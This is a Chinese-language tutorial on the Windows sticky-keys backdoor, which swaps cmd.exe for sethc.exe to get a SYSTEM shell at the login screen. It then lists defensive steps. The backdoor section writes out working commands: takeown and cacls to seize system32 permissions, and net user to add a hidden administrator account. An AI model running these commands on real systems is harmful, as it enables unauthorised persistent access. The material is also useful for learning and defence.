shift快捷
Windows的粘滯鍵------C:\windows\system32\sethc.exe,它本是為不方便按組合鍵的人設計的
Windows系統按5下shift后,Windows就執行了system32下的sethc.exe,也就是啟用了粘滯鍵
在進程里可以看到是以當前用戶的權限運行
但是當我們未登陸系統(停留在登陸界面)的時候 系統還不知道我們將以哪個用戶登陸,所以在這個時候連續按5次shift后的話系統將會以system用戶(具有管理員級別的權限)來運行sethc.exe這個程序
后門原理
我們可以把cmd.exe這個程序更名稱sethc.exe並且把原來的sethc.exe替換掉
在登陸界面的時候我們連續按下5吃shift鍵系統以system權限就會運行我們的CMD.exe
那么我們的cmd.exe就具有了管理員權限了 如此一來 我們只要利用CMD加一個管理員用戶就可以登陸進去,實現隱藏后門
后門制作
其制作有很多種,下面介紹一種最簡單的,可以明白其原理自己擴展
在命令行執行(需要一定的權限)
copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe //如果沒指定生成的文件,會直接覆蓋copy的第二個參數,相當於將第二個參數換成了第一個參數,但是文件外部名稱沒變
發現拒絕訪問
出現這樣的情況我們就需要將將權限目錄下的所有文件及文件夾、子文件夾下的所有者更改為管理員組(administrators)命令
注銷,嘗試登陸界面直接運行出系統權限的cmd命令。
takeown /f c:\windows\system32\*.* /a /r /d y
cacls c:\windows\system32\*.* /T /E /G administrators:F
目錄下的文件、子文件夾的NTFS權限修改為僅管理員組(administrators)完全控制
然后系統文件夾權限。
如果提權后是system權限,需要在轉化
cacls c:\windows\system32\*.* /T /E /G system:F
現在可以用管理員權限訪問了
注銷,來看下登陸界面是否可以5個shift調用起來shift后門
通過命令添加為管理員登陸
net user gkk test /add && net localgroup administrators gkk /add
這個命令行存在時間限制,所以要快速輸入命令,達到添加用戶的目的。重啟嘗試登陸。
防御
禁用該功能
C:\windows\system32\sethc.exe
C:\windows\system32\dllcache\sethc.exe
(dllcache目錄是隱藏的,在文件夾選項里選擇"顯示所有文件和文件夾"把"隱藏受系統保護的操作系統文件"的選擇取消才能看得到)
開始------->控制面板---->輔助功能選項------>設置----->取消快捷鍵
使用權限來約束這兩個文件
就是讓所有人用不了,而且直接刪除sethc.exe文件,系統會自動找回
1.刪除所有組的權限
右鍵屬性,高級,有勾則去掉“允許父項的繼承權限傳播到該對象和所有子對象”的勾
2.添加一個everyone組,然后設置該組的所有權限都是“拒絕”
點擊”添加“,在出現的選擇用戶和組中點擊”立即查找“,在搜索結果中找到”Everoy“用戶,並確定
繼續確定,將”Everoy“用戶的權限設置為全部拒絕
這樣就禁止了安裝和在此訪問。當再次安裝和訪問時,就會出現拒絕訪問
學習文章:https://blog.csdn.net/auuuuuuuu/article/details/88902791